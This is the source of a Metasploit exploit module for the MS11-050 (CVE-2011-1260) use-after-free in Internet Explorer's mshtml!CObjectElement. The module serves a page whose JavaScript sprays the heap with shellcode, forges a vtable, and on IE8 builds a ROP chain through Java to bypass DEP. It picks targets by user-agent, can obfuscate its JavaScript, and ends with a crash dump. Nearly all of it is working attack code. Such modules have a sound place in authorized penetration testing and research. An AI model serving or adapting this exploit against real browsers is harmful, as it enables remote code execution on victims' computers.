285 lines
9.4 KiB
Ruby
285 lines
9.4 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = NormalRanking
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
include Msf::Exploit::RopDb
|
|
#include Msf::Exploit::Remote::BrowserAutopwn
|
|
#autopwn_info({
|
|
# :ua_name => HttpClients::IE,
|
|
# :ua_minver => "7.0",
|
|
# :ua_maxver => "8.0",
|
|
# :javascript => true,
|
|
# :os_name => OperatingSystems::Match::WINDOWS
|
|
#})
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "MS11-050 IE mshtml!CObjectElement Use After Free",
|
|
'Description' => %q{
|
|
This module exploits a use-after-free vulnerability in Internet Explorer. The
|
|
vulnerability occurs when an invalid <object> tag exists and other elements
|
|
overlap/cover where the object tag should be when rendered (due to their
|
|
styles/positioning). The mshtml!CObjectElement is then freed from memory because
|
|
it is invalid. However, the mshtml!CDisplay object for the page continues to keep
|
|
a reference to the freed <object> and attempts to call a function on it, leading
|
|
to the use-after-free.
|
|
|
|
Please note that for IE 8 targets, JRE (Java Runtime Environment) is required
|
|
to bypass DEP (Data Execution Prevention).
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'd0c_s4vage', #Discovery, poc
|
|
'sinn3r', #ROP (thx corelanc0d3r), Windows 7
|
|
'bannedit' #Windows 7
|
|
],
|
|
'References' =>
|
|
[
|
|
['CVE', '2011-1260'],
|
|
['OSVDB', '72950'],
|
|
['MSB', 'MS11-050'],
|
|
['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html']
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'process',
|
|
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
|
|
},
|
|
'Payload' =>
|
|
{
|
|
'Space' => 500,
|
|
'BadChars' => "\x00\x09\x0a\x0d'\\",
|
|
'StackAdjustment' => -3500
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
[ 'Automatic', { } ],
|
|
# In IE6 the mshtml!CObjectElement size is 0xac
|
|
[
|
|
'Internet Explorer 7 on XP SP3',
|
|
{
|
|
'Rop' => false,
|
|
'Ret' => nil, #Not required for non-ROP targets
|
|
'TargetAddr' => 0x0c0c0c0c, #For vtable
|
|
'ObjSize' => '0xB0', #mshtml!CObjectElement size
|
|
'Offset' => '0x01',
|
|
}
|
|
],
|
|
[
|
|
'Internet Explorer 7 on Windows Vista',
|
|
{
|
|
'Rop' => false,
|
|
'Ret' => nil, #Not required for non-ROP targets
|
|
'TargetAddr' => 0x0c0c0c0c, #For vtable
|
|
'ObjSize' => '0xB0', #mshtml!CObjectElement size
|
|
'Offset' => '0x01',
|
|
}
|
|
],
|
|
[
|
|
'Internet Explorer 8 on XP SP3',
|
|
{
|
|
'Rop' => true,
|
|
'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
|
|
'TargetAddr' => 0x0c0c0c0c, #For vtable
|
|
'ObjSize' => '0xE0', #mshtml!CObjectElement size
|
|
'Offset' => '0x5E2',
|
|
}
|
|
],
|
|
[
|
|
'Internet Explorer 8 on Windows 7',
|
|
{
|
|
'Rop' => true,
|
|
'Ret' => 0x7C348B05, #Stack pivot (xchg eax,esp; retn from java)
|
|
'TargetAddr' => 0x0c0c0c0c, #For vtable
|
|
'ObjSize' => '0xE0', #mshtml!CObjectElement size
|
|
'Offset' => '0x5F4',
|
|
}
|
|
],
|
|
[ 'Debug Target (Crash)', {} ],
|
|
],
|
|
'DisclosureDate' => "Jun 16 2011",
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
|
|
])
|
|
end
|
|
|
|
def auto_target(cli, request)
|
|
agent = request.headers['User-Agent']
|
|
|
|
if agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
|
|
#Windows XP + IE7
|
|
mytarget = targets[1]
|
|
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
|
|
#Windows Vista + IE7
|
|
mytarget = targets[2]
|
|
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
|
|
#Windows XP + IE8
|
|
mytarget = targets[3]
|
|
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
|
|
#Windows 7 + IE8
|
|
mytarget = targets[4]
|
|
else
|
|
mytarget = nil
|
|
end
|
|
|
|
return mytarget
|
|
end
|
|
|
|
def on_request_uri(cli, request)
|
|
#Set default target
|
|
mytarget = target
|
|
debug = false
|
|
|
|
if target.name == 'Automatic'
|
|
mytarget = auto_target(cli, request)
|
|
if mytarget.nil?
|
|
agent = request.headers['User-Agent']
|
|
print_error("Unknown User-Agent #{agent}")
|
|
send_not_found(cli)
|
|
return
|
|
end
|
|
elsif target.name =~ /Debug/
|
|
debug = true
|
|
end
|
|
|
|
if debug
|
|
data = <<-DATA
|
|
<html>
|
|
<body>
|
|
<script language='javascript'>
|
|
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
|
|
document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
|
|
document.body.innerHTML += "AAAAAAA";
|
|
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
|
|
</script>
|
|
</body>
|
|
</html>
|
|
DATA
|
|
|
|
print_status("Triggering vulnerability (target: #{mytarget.name})...")
|
|
send_response(cli, data, { 'Content-Type' => 'text/html' })
|
|
return
|
|
end
|
|
|
|
if mytarget['Rop']
|
|
p = make_nops(44) #Nops
|
|
p << "\xeb\x04\xff\xff" #Jmp over the pivot
|
|
p << [mytarget.ret].pack('V') #Stack pivot
|
|
p << payload.encoded
|
|
|
|
rop_payload = generate_rop_payload('java', p)
|
|
end
|
|
|
|
code = (rop_payload) ? rop_payload : payload.encoded
|
|
|
|
# fill the vtable
|
|
vtable = [mytarget['TargetAddr']].pack('V*')
|
|
|
|
#Convert code format so we can unescape() in JavaScript
|
|
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
|
|
vtable_js = Rex::Text.to_unescape(vtable, Rex::Arch.endian(target.arch))
|
|
|
|
randnop = rand_text_alpha(rand(100) + 1)
|
|
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
|
|
|
|
#Extract string based on what the setup is
|
|
if mytarget.name == 'Internet Explorer 8 on XP SP3'
|
|
js_extract_str = "var block = shellcode.substring(2, 0x20000-0x21);"
|
|
elsif mytarget.name == 'Internet Explorer 8 on Windows 7'
|
|
js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
|
|
else
|
|
js_extract_str = "var block = shellcode.substring(0, (0x40000-6)/2);"
|
|
end
|
|
|
|
js = <<-JS
|
|
function timedRefresh(timeoutPeriod) {
|
|
setTimeout("location.reload(true);",timeoutPeriod);
|
|
}
|
|
|
|
function enable_lfh(heaplib_obj, obj_size, max) {
|
|
var vtable = unescape("#{vtable_js}");
|
|
while (vtable.length < obj_size) vtable += vtable;
|
|
var obj = vtable.substring(0, (obj_size-6)/2);
|
|
for (var i=1; i < max; i++) {
|
|
heaplib_obj.alloc(obj);
|
|
}
|
|
}
|
|
|
|
function heap_spray(heaplib_obj, offset) {
|
|
var code = unescape("#{code_js}");
|
|
var #{randnop} = "#{js_nops}";
|
|
var nops = unescape(#{randnop});
|
|
|
|
while (nops.length < 0x1000) nops += nops;
|
|
offset = nops.substring(0, #{mytarget['Offset']});
|
|
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
|
|
while (shellcode.length < 0x40000) shellcode += shellcode;
|
|
#{js_extract_str}
|
|
heaplib_obj.gc();
|
|
for (var i2=0; i2 < 0x400-1; i2++) {
|
|
heaplib_obj.alloc(block);
|
|
}
|
|
}
|
|
|
|
heap = new heapLib.ie(0x20000);
|
|
heap_spray(heap, #{mytarget['Offset']});
|
|
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
|
|
|
|
document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
|
|
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
|
|
|
|
document.body.innerHTML += "<a id='tag_4' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
|
|
enable_lfh(heap, #{mytarget['ObjSize']}, 0x200);
|
|
|
|
document.body.innerHTML += "BBBBBBBBBBBBBBBBBBBBBBB";
|
|
enable_lfh(heap, #{mytarget['ObjSize']}, 0x500);
|
|
|
|
document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
|
|
|
|
timedRefresh(2000);
|
|
JS
|
|
|
|
js = heaplib(js, {:noobfu => true})
|
|
|
|
if datastore['OBFUSCATE']
|
|
js = ::Rex::Exploitation::JSObfu.new(js)
|
|
js.obfuscate(memory_sensitive: true)
|
|
end
|
|
|
|
html = <<-HTML
|
|
<html>
|
|
<body>
|
|
<script language='javascript'>
|
|
#{js}
|
|
</script>
|
|
</body>
|
|
</html>
|
|
HTML
|
|
|
|
print_status("Sending exploit (#{mytarget.name})...")
|
|
send_response(cli, html, {'Content-Type'=>'text/html'})
|
|
end
|
|
end
|
|
|
|
|
|
=begin
|
|
(b00.1ac): Access violation - code c0000005 (first chance)
|
|
First chance exceptions are reported before any exception handling.
|
|
This exception may be expected and handled.
|
|
eax=0c0c0c0c ebx=0294b920 ecx=0bb300c8 edx=00000000 esi=020be380 edi=00000000
|
|
eip=6363fcc6 esp=020be354 ebp=020be36c iopl=0 nv up ei pl zr na pe nc
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
|
|
mshtml!CElement::Doc+0x2:
|
|
6363fcc6 8b5070 mov edx,dword ptr [eax+70h] ds:0023:0c0c0c7c=????????
|
|
=end
|